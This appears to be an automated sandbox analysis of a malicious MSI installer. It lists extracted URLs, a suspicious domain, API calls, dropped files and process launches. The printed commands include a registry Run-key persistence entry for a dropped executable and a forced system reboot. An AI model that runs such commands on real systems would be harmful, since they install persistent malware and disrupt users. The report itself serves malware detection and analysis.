Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: shi64B2.tmp.3.drString found in binary or memory: http://html4/loose.dtd
Source: vJrY.png.3.drString found in binary or memory: http://ocsp.digicert.com0A
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, vJrY.png.3.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
Source: vJrY.png.3.drString found in binary or memory: http://ocsp.digicert.com0X
Source: vJrY.png.3.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: vJrY.png.3.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vJrY.png.3.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: vJrY.png.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drString found in binary or memory: http://stackoverflow.com/q/11564914;
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/q/14436606/
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drString found in binary or memory: http://stackoverflow.com/q/14436606/WAsReference
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drString found in binary or memory: http://stackoverflow.com/q/2152978/23354
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://t2.symcb.com0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://tl.symcd.com0&
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
Source: vJrY.png.3.drString found in binary or memory: http://www.mcafee.com
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://acons2020temix54.lisf
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://acons2020temix54.lisf/
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drString found in binary or memory: https://collect.installeranalytics.com
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drString found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 9rybs.msi, 495fa1.msi.2.drString found in binary or memory: https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html
Source: vJrY.png.3.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49707 version: TLS 1.2

System Summary

barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess Stats: CPU usage > 49%
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_003F0140 GetClientRect,IsWindow,ShowWindow,DestroyWindow,PostQuitMessage,NtdllDefWindowProc_W,GetClientRect,NtdllDefWindowProc_W,GetClientRect,IsWindow,BringWindowToTop,__Mtx_unlock,SetWindowTextW,__Mtx_unlock,IsWindow,SetForegroundWindow,__Mtx_unlock,__Mtx_unlock,IsWindow,ShowWindow,UpdateWindow,IsWindow,ShowWindow,UpdateWindow,GetWindowRect,MoveWindow,Sleep,GetWindowRect,MoveWindow,Sleep,__Mtx_unlock,12_2_003F0140
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_003FD2A0 NtQueryVirtualMemory,NtCreateFile,NtCreateFile,12_2_003FD2A0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_003FF4F0 GetCurrentProcess,GetModuleHandleW,NtCreateFile,12_2_003FF4F0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00406090 NtClose,NtClose,12_2_00406090
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040A190 NtQueryInformationThread,NtQueryInformationThread,NtQueryInformationThread,12_2_0040A190
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00405480 NtCreateFile,NtCreateFile,12_2_00405480
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00402520 Concurrency::cancel_current_task,NtQueryDirectoryFile,NtQueryDirectoryFile,12_2_00402520
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00405AD0 NtQueryFullAttributesFile,NtQueryFullAttributesFile,12_2_00405AD0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle,12_2_0040CB80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00405F60: DeviceIoControl,GetLastError,12_2_00405F60
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\495fa1.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6185.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI62DE.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI635C.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6467.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6487.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F17.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F47.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7003.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7033.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI70A2.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F25.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6185.tmpJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0041C01212_2_0041C012
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0043901B12_2_0043901B
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0041815012_2_00418150
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004351C812_2_004351C8
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004191B012_2_004191B0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040B36012_2_0040B360
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0043044A12_2_0043044A
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004135B012_2_004135B0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0042C75F12_2_0042C75F
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_003EA72012_2_003EA720
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0041A70012_2_0041A700
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040887012_2_00408870
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0042CAED12_2_0042CAED
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040BAF012_2_0040BAF0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040CB8012_2_0040CB80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00403B8012_2_00403B80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00402C6012_2_00402C60
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00434D4012_2_00434D40
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00419D0012_2_00419D00
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_025B4ED812_2_025B4ED8
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_025B4EC912_2_025B4EC9
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06302E9112_2_06302E91
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_063026D012_2_063026D0
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06307D7812_2_06307D78
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0630031412_2_06300314
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0630143012_2_06301430
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_063005A812_2_063005A8
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0630321112_2_06303211
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06321DD812_2_06321DD8
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06325D0F12_2_06325D0F
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06325D6D12_2_06325D6D
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06325D8912_2_06325D89
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: String function: 003FB3E0 appears 35 times
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: String function: 00400320 appears 46 times
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: String function: 00426800 appears 39 times
Source: 9rybs.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs 9rybs.msi
Source: 9rybs.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs 9rybs.msi
Source: 9rybs.msiBinary or memory string: OriginalFilenameInstallerAnalytics.dllF vs 9rybs.msi
Source: 9rybs.msiBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs 9rybs.msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: shi64B2.tmp.3.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: 9rybs.msi, 495fa1.msi.2.drBinary or memory string: .VBP2
Source: classification engineClassification label: mal64.rans.evad.winMSI@15/33@3/3
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\AdvinstAnalyticsJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMutant created: \Sessions\1\BaseNamedObjects\DM0Ab6K//fQJogkamn3nDv0Hk7oulb5M1UDzxef1Ua8YhFSRu4d0RJHhGDKUPKZ8
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{46C61DD2-00A3-46F1-B456-3E6CDCEF89B7}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFBAD3E09A4BB3EFCB.TMPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: unknownProcess created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBDJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"Jump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
